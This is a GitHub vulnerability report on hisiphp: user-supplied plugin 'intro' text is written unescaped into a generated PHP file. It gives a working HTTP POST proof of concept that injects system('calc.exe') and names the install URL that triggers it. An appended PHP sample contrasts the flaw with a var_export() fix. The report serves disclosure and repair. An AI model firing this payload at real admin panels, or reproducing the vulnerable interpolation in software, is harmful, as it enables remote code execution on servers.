A code injection vulnerability · Issue #11 · hisiphp/hisiphp · GitHub
A code injection vulnerability #11
Open
@LioTree

Description

Hi, there is a code injection vulnerability.

In the following line, $data is controlled by users:

$data = $this->request->post();

The validator https://github.com/hisiphp/hisiphp/blob/thinkphp5.1/v2/application/system/validate/SystemPlugins.php has been used here to impose restrictions on $data, but only some fields have been limited.

class SystemPlugins extends Validate
{
    // Define the validation rules
    protected $rule = [
        'name|插件名称'     => 'require|alpha|unique:system_plugins',
        'title|插件标题'     => 'require|chsAlphaNum|unique:system_plugins',
        'identifier|插件标识' => 'require|regex:/^[A-Za-z0-9\-\.\_]+$/',
        'author|开发者'     => 'requireWith:author|chsAlphaNum',
        'url|开发者网址'     => 'requireWith:url|url',
        'version|版本号'     => 'require|regex:/^[0-9][.][0-9][.][0-9]+$/',
    ];
}

In the following line, $data['intro'] is injected into PHP code without restriction:

'intro' => '{$data['intro']}',

POC:

POST /admin.php/system/plugins/design.html HTTP/1.1
Host: www.myhisiphp.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 209
Origin: http://www.myhisiphp.com
DNT: 1
Sec-GPC: 1
Connection: close
Referer: http://www.myhisiphp.com/admin.php/system/plugins/design.html
Cookie: PHPSESSID=fljtslc00l472cll5df60ilp39; hisiadmin_language=zh-cn; hisihisi_admin_theme=default; hisihisi_iframe=1; hisi_language=zh-cn

name=test&title=test&identifier=test&intro=%27%2Esystem%28%27calc%2Eexe%27%29%2E%27&author=test&url=http%3A%2F%2Fwww.test.com&version=1.0.0&dir=admin%0D%0Ahome%0D%0Amodel%0D%0Asql%0D%0Avalidate%0D%0Aview%0D%0A

The content of the generated plugins/test/info.php is as follows:

return [
    //......
    'intro' => ''.system('calc.exe').'',
    //......
];

Visiting /admin.php/system/plugins/install/id/5.html can trigger the execution of malicious code, where 5 is the id of the plugin.

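The following is an added illustration, not hisiphp's own code: it reproduces the interpolation pattern the issue quotes, shows why a single quote in the intro field lets the rest of the value become PHP source, and contrasts it with generating the file via var_export(), which emits a properly escaped literal. The function names and the temp-file round trip are assumptions for the demonstration.

```php
<?php
// Constructed input: the decoded form of the intro value from the PoC above.
$data = [
    'name'  => 'test',
    'intro' => "'.system('calc.exe').'",
];

// Vulnerable pattern (as quoted in the issue): the raw value is spliced into
// PHP source text, so a quote inside it closes the string literal and the
// remainder is compiled as code when the file is later included.
function buildInfoVulnerable(array $data): string
{
    return "<?php\nreturn [\n"
         . "    'name' => '{$data['name']}',\n"
         . "    'intro' => '{$data['intro']}',\n"
         . "];\n";
}

// Hardened variant: build the array in memory and serialise it with
// var_export(), which escapes quotes and backslashes. The value can only ever
// be a string literal, never executable code, regardless of its content.
// Restricting 'intro' in the validator (as done for 'name', 'title', etc.)
// is a sensible second layer, but escaping at generation time is the fix.
function buildInfoSafe(array $data): string
{
    $info = [
        'name'  => $data['name'],
        'intro' => $data['intro'],
    ];
    return "<?php\nreturn " . var_export($info, true) . ";\n";
}

// Round-trip check: the safely generated file, when included, yields the
// exact input string and executes nothing else.
function roundTripIntro(array $data): string
{
    $tmp = tempnam(sys_get_temp_dir(), 'info');
    file_put_contents($tmp, buildInfoSafe($data));
    $loaded = include $tmp;
    unlink($tmp);
    return $loaded['intro'];
}

echo "--- vulnerable info.php ---\n", buildInfoVulnerable($data);
echo "--- hardened info.php ---\n", buildInfoSafe($data);
assert(roundTripIntro($data) === $data['intro']);
```

Compare the two generated files: in the first, the intro line contains a bare system() call; in the second, the same bytes survive only as an escaped string.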